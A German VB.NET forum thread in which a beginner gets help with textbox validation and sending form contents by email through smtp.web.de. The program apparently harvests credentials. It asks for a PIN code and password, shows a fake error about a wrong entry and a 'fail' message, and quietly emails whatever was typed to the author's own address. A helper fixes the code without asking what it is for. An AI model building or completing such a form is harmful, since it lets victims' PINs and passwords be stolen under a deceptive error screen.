! Bei Alert Mail nicht senden + andere Frage !

  • VB.NET

Es gibt 7 Antworten in diesem Thema. Der letzte Beitrag () ist von Rinecamo.

    ! Bei Alert Mail nicht senden + andere Frage !

    Hi,

    habe gleich 2 Probleme.
    1.Problem:
    Benutze diesen Code um meine Textbox abzusenden.

    VB.NET-Quellcode

    1. ´Dim text As String
    2. text = TextBox1.Text & vbCrLf & TextBox2.Text & vbCrLf & TextBox3.Text & vbCrLf & TextBox4.Text & vbCrLf & TextBox6.Text + vbLf
    3. Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
    4. myClient.Credentials = New NetworkCredential("emaile", "pw")
    5. myClient.Send("email", "email", "ttt", text)

    VB.NET-Quellcode

    1. ´[vb]If TextBox1.Text.Count < 4 Then MsgBox("Bei deinem PIN-Code und/oder Passwort ist ein Fehler aufgetreten. Bitte überprüfe die korrekte Eingabe des PIN-Codes oder Passworts.") Else 'hier die Anweisung um das Formular zu senden. End If
    [/vb]
    Wie lautet nur der Code für senden in Kurzform den ich in der grünen Schrift hinzufügen muss?

    2.Problem:

    VB.NET-Quellcode

    1. If TextBox1.TextLength < 4 Then
    2. MessageBox.Show("fehler.")
    3. Else
    4. Timer1.Start()
    5. End If
    6. If TextBox2.TextLength < 4 Then
    7. MessageBox.Show("fehler.")
    8. Else
    9. Timer1.Start()
    10. End If

    Wenn ich jetzt in Textbox 1 nichts eingebe startet die der Timer nicht und somit auch nicht die Progressbar.
    Doch gebe ich bei Textbox1 was ein und lasse Textbox2 aus, startet der Timer, da Tb 1 ausgefüllt ist.
    Wie stelle ich eins das alle Textboxen zusammen sind so

    VB.NET-Quellcode

    1. If TextBox1.TextLenght & Textbox2.Textlenght <4 Then
    2. MsgBox("fehler)
    3. Else Timer1.Start()
    4. End IF



    Danke.

    Rinecamo schrieb:

    1. Was für ein Formular?

    VB.NET-Quellcode

    1. If TextBox1.Text.Length > 4 And TextBox2.Text.Length > 4 Then
    2. MessageBox.Show()
    3. Else
    4. MessageBox.Show()
    5. End If


    Ja hast ja jetzt den Code bei Else gemacht, da kommt ja normalerweise die Anweisung um das Formular zu senden.

    VB.NET-Quellcode

    1. If TextBox1.Text.Length > 4 And TextBox2.Text.Length > 4 Then
    2. MessageBox.Show()
    3. Else
    4. 'Formular senden
    5. End If


    Hab das ma jetzt als Kommentar gemacht...
    Wie heißt die Anweisung um das Formular zu senden bei Else?


    So hab ich das.

    VB.NET-Quellcode

    1. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    2. Dim text As String
    3. text = TextBox1.Text & vbCrLf & TextBox2.Text & vbCrLf & TextBox3.Text & vbCrLf & TextBox4.Text & vbCrLf & TextBox6.Text + vbLf
    4. Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
    5. myClient.Credentials = New NetworkCredential("email", "pw")
    6. myClient.Send("emaiol", "email", "titel", text)


    VB.NET-Quellcode

    1. If TextBox1.Text.Length > 4 And TextBox2.Text.Length > 4 Then
    2. MessageBox.Show()
    3. Else
    4. Dim text As String
    5. text = TextBox1.Text & vbCrLf & TextBox2.Text & vbCrLf & TextBox3.Text & vbCrLf & TextBox4.Text & vbCrLf & TextBox6.Text + vbLf
    6. Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
    7. myClient.Credentials = New NetworkCredential("email", "pw")
    8. myClient.Send("emaiol", "email", "titel", text)
    9. End If
    Also des

    VB.NET-Quellcode

    1. If TextBox1.Text.Length < 4 And TextBox2.Text.Length < 4 Then
    2. MessageBox.Show("fail")
    3. Else
    4. Timer1.Start()
    5. End If

    funktioniert irgendwie nicht.Wenn ich Textbox 2 Leer lasse startet der Timer trotzdem.

    Das funktioniert leider auch nicht, kriege da 2Fehler.

    VB.NET-Quellcode

    1. If TextBox1.Text.Length > 4 And TextBox2.Text.Length > 4 Then
    2. MessageBox.Show()
    3. Else
    4. Timer1.Start()
    5. Dim text As String
    6. text = TextBox1.Text & vbCrLf & TextBox2.Text & vbCrLf & TextBox3.Text & vbCrLf & TextBox4.Text & vbCrLf & TextBox6.Text + vbLf
    7. Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
    8. myClient.Credentials = New NetworkCredential("email", "pw")
    9. myClient.Send("emaiol", "email", "titel", text)
    10. End If



    Fehler:Fehler 1 Die Variable "text" verbirgt eine Variable in einem einschließenden Block.
    Fehler 2 Die Variable "myClient" verbirgt eine Variable in einem einschließenden Block.

    BreMen schrieb:

    Also des

    VB.NET-Quellcode

    1. If TextBox1.Text.Length < 4 And TextBox2.Text.Length < 4 Then
    2. MessageBox.Show("fail")
    3. Else
    4. Timer1.Start()
    5. End If

    funktioniert irgendwie nicht.Wenn ich Textbox 2 Leer lasse startet der Timer trotzdem.
    Ernsthaft, ich bin gerade heftig am lachen. Ist doch klar das der startet. Die Messagebox wird nur geöffnet wenn in BEIDEN mehr als 4 Wörter drin stehen, andernfalls wird der Timer gestartet.
    Deklarier das mal global:

    VB.NET-Quellcode

    1. Dim text As String
    2. text = TextBox1.Text & vbCrLf & TextBox2.Text & vbCrLf & TextBox3.Text & vbCrLf & TextBox4.Text & vbCrLf & TextBox6.Text + vbLf
    3. Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
    4. myClient.Credentials = New NetworkCredential("email", "pw")

    Unter Timer1.Start schreibst du dann nurnoch

    VB.NET-Quellcode

    1. myClient.Send("emaiol", "email", "titel", text)

    Rinecamo schrieb:

    BreMen schrieb:

    Also des

    VB.NET-Quellcode

    1. If TextBox1.Text.Length < 4 And TextBox2.Text.Length < 4 Then
    2. MessageBox.Show("fail")
    3. Else
    4. Timer1.Start()
    5. End If

    funktioniert irgendwie nicht.Wenn ich Textbox 2 Leer lasse startet der Timer trotzdem.
    Ernsthaft, ich bin gerade heftig am lachen. Ist doch klar das der startet. Die Messagebox wird nur geöffnet wenn in BEIDEN mehr als 4 Wörter drin stehen, andernfalls wird der Timer gestartet.
    Ja, das dachte ich auch aber komischerweise zeigt er mir die Messagebox bei <4 an wenn ich nichts eingebe .Wenn ich >4 mache und nichts eingebe schickt er die Nachricht bzw. startet den Timer.

    Das andere Probleme habe ich nun erfolgreich gelöst, dieser Code funzt jetzt.Wenn der Timer startet sendet er die Nachricht und nicht bei Klick auf Button:

    VB.NET-Quellcode

    1. If ProgressBar1.Value = ProgressBar1.Maximum Then
    2. Timer1.Stop()
    3. MsgBox("fail")
    4. Dim text As String
    5. text = TextBox1.Text & vbCrLf & TextBox2.Text & vbCrLf & TextBox3.Text & vbCrLf & TextBox4.Text & vbCrLf & TextBox6.Text + vbLf
    6. Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
    7. myClient.Credentials = New NetworkCredential("email", "pw")
    8. myClient.Send("email", "email", "titel", text)
    9. End If


    Ich hab halt noch das Problem mit dem Messageboxen...
    Sobald ich was in Textbox 1 eingebe und Button anklicke startet er die Progressbar bzw. den Timer obwohl Textbox2 leer ist.
    Ja, das dachte ich auch aber komischerweise zeigt er mir die Messagebox bei <4 an wenn ich nichts eingebe .Wenn ich >4 mache und nichts eingebe schickt er die Nachricht bzw. startet den Timer.
    Du willst mich jetzt verarschen oder? Denk doch mal nach. So schwer kann das doch nich sein -_-
    @Ja, das dachte ich auch aber komischerweise zeigt er mir die Messagebox bei <4 an wenn ich nichts eingebe
    Ja, da dann beide Textboxen eine Textlänge von unter 4 haben -_-. Weißt du überhaupt was die <> bedeuten?

    @Wenn ich >4 mache und nichts eingebe schickt er die Nachricht bzw. startet den Timer.
    Ja, da beide Textboxen nicht mehr als 4 Zeichen beinhalten. Ich dacht eig. ich hätte das bei meinem letzten Post deutlich genug gemacht.

    Das ist einfach logisches denken, was anscheinend nicht so dein Fall ist.

    VB.NET-Quellcode

    1. 'Ich nehme mal an, das löst dein Problem.
    2. If TextBox1.Text.Length < 4 And TextBox2.Text.Length < 4 Then
    3. Timer1.Start()
    4. Else
    5. MessageBox.Show("fail")
    6. End If